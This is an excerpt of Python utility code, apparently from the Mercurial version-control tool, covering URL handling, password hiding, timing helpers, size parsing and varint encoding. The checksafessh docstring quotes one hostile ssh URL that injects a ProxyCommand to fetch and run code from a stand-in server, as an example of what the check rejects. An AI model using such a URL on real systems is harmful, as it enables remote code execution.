3137 3137 return b'<url %s>' % b', '.join(attrs)
3138 3138
3139 3139 def __bytes__(self):
3140 3140 r"""Join the URL's components back into a URL string.
3141 3141
3142 3142 Examples:
3143 3143
3144 3144 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3145 3145 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3146 3146 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3147 3147 'http://user:pw@host:80/?foo=bar&baz=42'
3148 3148 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3149 3149 'http://user:pw@host:80/?foo=bar%3dbaz'
3150 3150 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3151 3151 'ssh://user:pw@[::1]:2200//home/joe#'
3152 3152 >>> bytes(url(b'http://localhost:80//'))
3153 3153 'http://localhost:80//'
3154 3154 >>> bytes(url(b'http://localhost:80/'))
3155 3155 'http://localhost:80/'
3156 3156 >>> bytes(url(b'http://localhost:80'))
3157 3157 'http://localhost:80/'
3158 3158 >>> bytes(url(b'bundle:foo'))
3159 3159 'bundle:foo'
3160 3160 >>> bytes(url(b'bundle://../foo'))
3161 3161 'bundle:../foo'
3162 3162 >>> bytes(url(b'path'))
3163 3163 'path'
3164 3164 >>> bytes(url(b'file:///tmp/foo/bar'))
3165 3165 'file:///tmp/foo/bar'
3166 3166 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3167 3167 'file:///c:/tmp/foo/bar'
3168 3168 >>> print(url(br'bundle:foo\bar'))
3169 3169 bundle:foo\bar
3170 3170 >>> print(url(br'file:///D:\data\hg'))
3171 3171 file:///D:\data\hg
3172 3172 """
3173 3173 if self._localpath:
3174 3174 s = self.path
3175 3175 if self.scheme == b'bundle':
3176 3176 s = b'bundle:' + s
3177 3177 if self.fragment:
3178 3178 s += b'#' + self.fragment
3179 3179 return s
3180 3180
3181 3181 s = self.scheme + b':'
3182 3182 if self.user or self.passwd or self.host:
3183 3183 s += b'//'
3184 3184 elif self.scheme and (
3185 3185 not self.path
3186 3186 or self.path.startswith(b'/')
3187 3187 or hasdriveletter(self.path)
3188 3188 ):
3189 3189 s += b'//'
3190 3190 if hasdriveletter(self.path):
3191 3191 s += b'/'
3192 3192 if self.user:
3193 3193 s += urlreq.quote(self.user, safe=self._safechars)
3194 3194 if self.passwd:
3195 3195 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3196 3196 if self.user or self.passwd:
3197 3197 s += b'@'
3198 3198 if self.host:
3199 3199 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3200 3200 s += urlreq.quote(self.host)
3201 3201 else:
3202 3202 s += self.host
3203 3203 if self.port:
3204 3204 s += b':' + urlreq.quote(self.port)
3205 3205 if self.host:
3206 3206 s += b'/'
3207 3207 if self.path:
3208 3208 # TODO: similar to the query string, we should not unescape the
3209 3209 # path when we store it, the path might contain '%2f' = '/',
3210 3210 # which we should *not* escape.
3211 3211 s += urlreq.quote(self.path, safe=self._safepchars)
3212 3212 if self.query:
3213 3213 # we store the query in escaped form.
3214 3214 s += b'?' + self.query
3215 3215 if self.fragment is not None:
3216 3216 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3217 3217 return s
3218 3218
3219 3219 __str__ = encoding.strmethod(__bytes__)
3220 3220
3221 3221 def authinfo(self):
3222 3222 user, passwd = self.user, self.passwd
3223 3223 try:
3224 3224 self.user, self.passwd = None, None
3225 3225 s = bytes(self)
3226 3226 finally:
3227 3227 self.user, self.passwd = user, passwd
3228 3228 if not self.user:
3229 3229 return (s, None)
3230 3230 # authinfo[1] is passed to urllib2 password manager, and its
3231 3231 # URIs must not contain credentials. The host is passed in the
3232 3232 # URIs list because Python < 2.4.3 uses only that to search for
3233 3233 # a password.
3234 3234 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3235 3235
3236 3236 def isabs(self):
3237 3237 if self.scheme and self.scheme != b'file':
3238 3238 return True # remote URL
3239 3239 if hasdriveletter(self.path):
3240 3240 return True # absolute for our purposes - can't be joined()
3241 3241 if self.path.startswith(br'\\'):
3242 3242 return True # Windows UNC path
3243 3243 if self.path.startswith(b'/'):
3244 3244 return True # POSIX-style
3245 3245 return False
3246 3246
3247 3247 def localpath(self):
3248 3248 if self.scheme == b'file' or self.scheme == b'bundle':
3249 3249 path = self.path or b'/'
3250 3250 # For Windows, we need to promote hosts containing drive
3251 3251 # letters to paths with drive letters.
3252 3252 if hasdriveletter(self._hostport):
3253 3253 path = self._hostport + b'/' + self.path
3254 3254 elif (
3255 3255 self.host is not None and self.path and not hasdriveletter(path)
3256 3256 ):
3257 3257 path = b'/' + path
3258 3258 return path
3259 3259 return self._origpath
3260 3260
3261 3261 def islocal(self):
3262 3262 '''whether localpath will return something that posixfile can open'''
3263 3263 return (
3264 3264 not self.scheme
3265 3265 or self.scheme == b'file'
3266 3266 or self.scheme == b'bundle'
3267 3267 )
3268 3268
3269 3269
3270 3270 def hasscheme(path):
3271 3271 return bool(url(path).scheme)
3272 3272
3273 3273
3274 3274 def hasdriveletter(path):
3275 3275 return path and path[1:2] == b':' and path[0:1].isalpha()
3276 3276
3277 3277
3278 3278 def urllocalpath(path):
3279 3279 return url(path, parsequery=False, parsefragment=False).localpath()
3280 3280
3281 3281
3282 3282 def checksafessh(path):
3283 3283 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3284 3284
3285 3285 This is a sanity check for ssh urls. ssh will parse the first item as
3286 3286 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3287 3287 Let's prevent these potentially exploited urls entirely and warn the
3288 3288 user.
3289 3289
3290 3290 Raises an error.Abort when the url is unsafe.
3291 3291 """
3292 3292 path = urlreq.unquote(path)
3293 3293 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3294 3294 raise error.Abort(
3295 3295 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3296 3296 )
3297 3297
3298 3298
3299 3299 def hidepassword(u):
3300 3300 '''hide user credential in a url string'''
3301 3301 u = url(u)
3302 3302 if u.passwd:
3303 3303 u.passwd = b'***'
3304 3304 return bytes(u)
3305 3305
3306 3306
3307 3307 def removeauth(u):
3308 3308 '''remove all authentication information from a url string'''
3309 3309 u = url(u)
3310 3310 u.user = u.passwd = None
3311 3311 return bytes(u)
3312 3312
3313 3313
3314 3314 timecount = unitcountfn(
3315 3315 (1, 1e3, _(b'%.0f s')),
3316 3316 (100, 1, _(b'%.1f s')),
3317 3317 (10, 1, _(b'%.2f s')),
3318 3318 (1, 1, _(b'%.3f s')),
3319 3319 (100, 0.001, _(b'%.1f ms')),
3320 3320 (10, 0.001, _(b'%.2f ms')),
3321 3321 (1, 0.001, _(b'%.3f ms')),
3322 3322 (100, 0.000001, _(b'%.1f us')),
3323 3323 (10, 0.000001, _(b'%.2f us')),
3324 3324 (1, 0.000001, _(b'%.3f us')),
3325 3325 (100, 0.000000001, _(b'%.1f ns')),
3326 3326 (10, 0.000000001, _(b'%.2f ns')),
3327 3327 (1, 0.000000001, _(b'%.3f ns')),
3328 3328 )
3329 3329
3330 3330
3331 3331 @attr.s
3332 3332 class timedcmstats(object):
3333 3333 """Stats information produced by the timedcm context manager on entering."""
3334 3334
3335 3335     # the starting value of the timer as a float (meaning and resolution
3336 3336     # are platform dependent, see util.timer)
3337 3337 start = attr.ib(default=attr.Factory(lambda: timer()))
3338 3338 # the number of seconds as a floating point value; starts at 0, updated when
3339 3339 # the context is exited.
3340 3340 elapsed = attr.ib(default=0)
3341 3341 # the number of nested timedcm context managers.
3342 3342 level = attr.ib(default=1)
3343 3343
3344 3344 def __bytes__(self):
3345 3345 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3346 3346
3347 3347 __str__ = encoding.strmethod(__bytes__)
3348 3348
3349 3349
3350 3350 @contextlib.contextmanager
3351 3351 def timedcm(whencefmt, *whenceargs):
3352 3352 """A context manager that produces timing information for a given context.
3353 3353
3354 3354 On entering a timedcmstats instance is produced.
3355 3355
3356 3356 This context manager is reentrant.
3357 3357
3358 3358 """
3359 3359 # track nested context managers
3360 3360 timedcm._nested += 1
3361 3361 timing_stats = timedcmstats(level=timedcm._nested)
3362 3362 try:
3363 3363 with tracing.log(whencefmt, *whenceargs):
3364 3364 yield timing_stats
3365 3365 finally:
3366 3366 timing_stats.elapsed = timer() - timing_stats.start
3367 3367 timedcm._nested -= 1
3368 3368
3369 3369
3370 3370 timedcm._nested = 0
3371 3371
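# Editorial sketch, not part of the original module: timedcm() yields its
# stats object on entry, so `elapsed` is only meaningful after the block
# exits. The label is hypothetical and the helper is never called.
def _exampletimedcm():
    with timedcm(b'example work') as stats:
        sum(range(1000))  # stand-in for real work
    return stats.elapsed  # seconds as a float, filled in on exit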
3372 3372
3373 3373 def timed(func):
3374 3374 '''Report the execution time of a function call to stderr.
3375 3375
3376 3376 During development, use as a decorator when you need to measure
3377 3377 the cost of a function, e.g. as follows:
3378 3378
3379 3379 @util.timed
3380 3380 def foo(a, b, c):
3381 3381 pass
3382 3382 '''
3383 3383
3384 3384 def wrapper(*args, **kwargs):
3385 3385 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3386 3386 result = func(*args, **kwargs)
3387 3387 stderr = procutil.stderr
3388 3388 stderr.write(
3389 3389 b'%s%s: %s\n'
3390 3390 % (
3391 3391 b' ' * time_stats.level * 2,
3392 3392 pycompat.bytestr(func.__name__),
3393 3393 time_stats,
3394 3394 )
3395 3395 )
3396 3396 return result
3397 3397
3398 3398 return wrapper
3399 3399
3400 3400
3401 3401 _sizeunits = (
3402 3402 (b'm', 2 ** 20),
3403 3403 (b'k', 2 ** 10),
3404 3404 (b'g', 2 ** 30),
3405 3405 (b'kb', 2 ** 10),
3406 3406 (b'mb', 2 ** 20),
3407 3407 (b'gb', 2 ** 30),
3408 3408 (b'b', 1),
3409 3409 )
3410 3410
3411 3411
3412 3412 def sizetoint(s):
3413 3413 '''Convert a space specifier to a byte count.
3414 3414
3415 3415 >>> sizetoint(b'30')
3416 3416 30
3417 3417 >>> sizetoint(b'2.2kb')
3418 3418 2252
3419 3419 >>> sizetoint(b'6M')
3420 3420 6291456
3421 3421 '''
3422 3422 t = s.strip().lower()
3423 3423 try:
3424 3424 for k, u in _sizeunits:
3425 3425 if t.endswith(k):
3426 3426 return int(float(t[: -len(k)]) * u)
3427 3427 return int(t)
3428 3428 except ValueError:
3429 3429 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3430 3430
3431 3431
3432 3432 class hooks(object):
3433 3433 '''A collection of hook functions that can be used to extend a
3434 3434 function's behavior. Hooks are called in lexicographic order,
3435 3435 based on the names of their sources.'''
3436 3436
3437 3437 def __init__(self):
3438 3438 self._hooks = []
3439 3439
3440 3440 def add(self, source, hook):
3441 3441 self._hooks.append((source, hook))
3442 3442
3443 3443 def __call__(self, *args):
3444 3444 self._hooks.sort(key=lambda x: x[0])
3445 3445 results = []
3446 3446 for source, hook in self._hooks:
3447 3447 results.append(hook(*args))
3448 3448 return results
3449 3449
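# Editorial sketch, not part of the original module: hooks run in
# lexicographic order of their source names, not registration order. The
# sources and callables are hypothetical and the helper is never called.
def _examplehooks():
    h = hooks()
    h.add(b'zzz', lambda x: x + 2)
    h.add(b'aaa', lambda x: x * 2)
    return h(10)  # -> [20, 12]: b'aaa' sorts before b'zzz'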
3450 3450
3451 3451 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3452 3452 '''Yields lines for a nicely formatted stacktrace.
3453 3453     Skips the 'skip' last entries, then returns the last 'depth' entries.
3454 3454 Each file+linenumber is formatted according to fileline.
3455 3455 Each line is formatted according to line.
3456 3456 If line is None, it yields:
3457 3457 length of longest filepath+line number,
3458 3458 filepath+linenumber,
3459 3459 function
3460 3460
3461 3461     Not to be used in production code, but very convenient while developing.
3462 3462 '''
3463 3463 entries = [
3464 3464 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3465 3465 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3466 3466 ][-depth:]
3467 3467 if entries:
3468 3468 fnmax = max(len(entry[0]) for entry in entries)
3469 3469 for fnln, func in entries:
3470 3470 if line is None:
3471 3471 yield (fnmax, fnln, func)
3472 3472 else:
3473 3473 yield line % (fnmax, fnln, func)
3474 3474
3475 3475
3476 3476 def debugstacktrace(
3477 3477 msg=b'stacktrace',
3478 3478 skip=0,
3479 3479 f=procutil.stderr,
3480 3480 otherf=procutil.stdout,
3481 3481 depth=0,
3482 3482 ):
3483 3483 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3484 3484     Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3485 3485     By default it will flush stdout first.
3486 3486     It can be used everywhere and intentionally does not require a ui object.
3487 3487     Not to be used in production code, but very convenient while developing.
3488 3488 '''
3489 3489 if otherf:
3490 3490 otherf.flush()
3491 3491 f.write(b'%s at:\n' % msg.rstrip())
3492 3492 for line in getstackframes(skip + 1, depth=depth):
3493 3493 f.write(line)
3494 3494 f.flush()
3495 3495
3496 3496
3497 3497 class dirs(object):
3498 3498 '''a multiset of directory names from a dirstate or manifest'''
3499 3499
3500 3500 def __init__(self, map, skip=None):
3501 3501 self._dirs = {}
3502 3502 addpath = self.addpath
3503 3503 if isinstance(map, dict) and skip is not None:
3504 3504 for f, s in map.iteritems():
3505 3505 if s[0] != skip:
3506 3506 addpath(f)
3507 3507 elif skip is not None:
3508 3508 raise error.ProgrammingError(
3509 3509 b"skip character is only supported " b"with a dict source"
3510 3510 )
3511 3511 else:
3512 3512 for f in map:
3513 3513 addpath(f)
3514 3514
3515 3515 def addpath(self, path):
3516 3516 dirs = self._dirs
3517 3517 for base in finddirs(path):
3518 3518 if base in dirs:
3519 3519 dirs[base] += 1
3520 3520 return
3521 3521 dirs[base] = 1
3522 3522
3523 3523 def delpath(self, path):
3524 3524 dirs = self._dirs
3525 3525 for base in finddirs(path):
3526 3526 if dirs[base] > 1:
3527 3527 dirs[base] -= 1
3528 3528 return
3529 3529 del dirs[base]
3530 3530
3531 3531 def __iter__(self):
3532 3532 return iter(self._dirs)
3533 3533
3534 3534 def __contains__(self, d):
3535 3535 return d in self._dirs
3536 3536
3537 3537
3538 3538 if safehasattr(parsers, 'dirs'):
3539 3539 dirs = parsers.dirs
3540 3540
3541 3541 if rustdirs is not None:
3542 3542 dirs = rustdirs
3543 3543
3544 3544
3545 3545 def finddirs(path):
3546 3546 pos = path.rfind(b'/')
3547 3547 while pos != -1:
3548 3548 yield path[:pos]
3549 3549 pos = path.rfind(b'/', 0, pos)
3550 3550 yield b''
3551 3551
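# Editorial sketch, not part of the original module: finddirs() yields every
# ancestor directory of a slash-separated path, deepest first, ending with
# the empty string for the root. The helper is never called.
def _examplefinddirs():
    return list(finddirs(b'a/b/c.txt'))  # -> [b'a/b', b'a', b'']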
3552 3552
3553 3553 # convenient shortcut
3554 3554 dst = debugstacktrace
3555 3555
3556 3556
3557 3557 def safename(f, tag, ctx, others=None):
3558 3558 """
3559 3559 Generate a name that it is safe to rename f to in the given context.
3560 3560
3561 3561 f: filename to rename
3562 3562 tag: a string tag that will be included in the new name
3563 3563 ctx: a context, in which the new name must not exist
3564 3564 others: a set of other filenames that the new name must not be in
3565 3565
3566 3566 Returns a file name of the form oldname~tag[~number] which does not exist
3567 3567 in the provided context and is not in the set of other names.
3568 3568 """
3569 3569 if others is None:
3570 3570 others = set()
3571 3571
3572 3572 fn = b'%s~%s' % (f, tag)
3573 3573 if fn not in ctx and fn not in others:
3574 3574 return fn
3575 3575 for n in itertools.count(1):
3576 3576 fn = b'%s~%s~%s' % (f, tag, n)
3577 3577 if fn not in ctx and fn not in others:
3578 3578 return fn
3579 3579
3580 3580
3581 3581 def readexactly(stream, n):
3582 3582 '''read n bytes from stream.read and abort if less was available'''
3583 3583 s = stream.read(n)
3584 3584 if len(s) < n:
3585 3585 raise error.Abort(
3586 3586 _(b"stream ended unexpectedly" b" (got %d bytes, expected %d)")
3587 3587 % (len(s), n)
3588 3588 )
3589 3589 return s
3590 3590
3591 3591
3592 3592 def uvarintencode(value):
3593 3593 """Encode an unsigned integer value to a varint.
3594 3594
3595 3595 A varint is a variable length integer of 1 or more bytes. Each byte
3596 3596 except the last has the most significant bit set. The lower 7 bits of
3597 3597 each byte store the 2's complement representation, least significant group
3598 3598 first.
3599 3599
3600 3600 >>> uvarintencode(0)
3601 3601 '\\x00'
3602 3602 >>> uvarintencode(1)
3603 3603 '\\x01'
3604 3604 >>> uvarintencode(127)
3605 3605 '\\x7f'
3606 3606 >>> uvarintencode(1337)
3607 3607 '\\xb9\\n'
3608 3608 >>> uvarintencode(65536)
3609 3609 '\\x80\\x80\\x04'
3610 3610 >>> uvarintencode(-1)
3611 3611 Traceback (most recent call last):
3612 3612 ...
3613 3613 ProgrammingError: negative value for uvarint: -1
3614 3614 """
3615 3615 if value < 0:
3616 3616 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3617 3617 bits = value & 0x7F
3618 3618 value >>= 7
3619 3619 bytes = []
3620 3620 while value:
3621 3621 bytes.append(pycompat.bytechr(0x80 | bits))
3622 3622 bits = value & 0x7F
3623 3623 value >>= 7
3624 3624 bytes.append(pycompat.bytechr(bits))
3625 3625
3626 3626 return b''.join(bytes)
3627 3627
3628 3628
3629 3629 def uvarintdecodestream(fh):
3630 3630 """Decode an unsigned variable length integer from a stream.
3631 3631
3632 3632 The passed argument is anything that has a ``.read(N)`` method.
3633 3633
3634 3634 >>> try:
3635 3635 ... from StringIO import StringIO as BytesIO
3636 3636 ... except ImportError:
3637 3637 ... from io import BytesIO
3638 3638 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3639 3639 0
3640 3640 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3641 3641 1
3642 3642 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3643 3643 127
3644 3644 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3645 3645 1337
3646 3646 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3647 3647 65536
3648 3648 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3649 3649 Traceback (most recent call last):
3650 3650 ...
3651 3651 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3652 3652 """
3653 3653 result = 0
3654 3654 shift = 0
3655 3655 while True:
3656 3656 byte = ord(readexactly(fh, 1))
3657 3657 result |= (byte & 0x7F) << shift
3658 3658 if not (byte & 0x80):
3659 3659 return result
3660 3660 shift += 7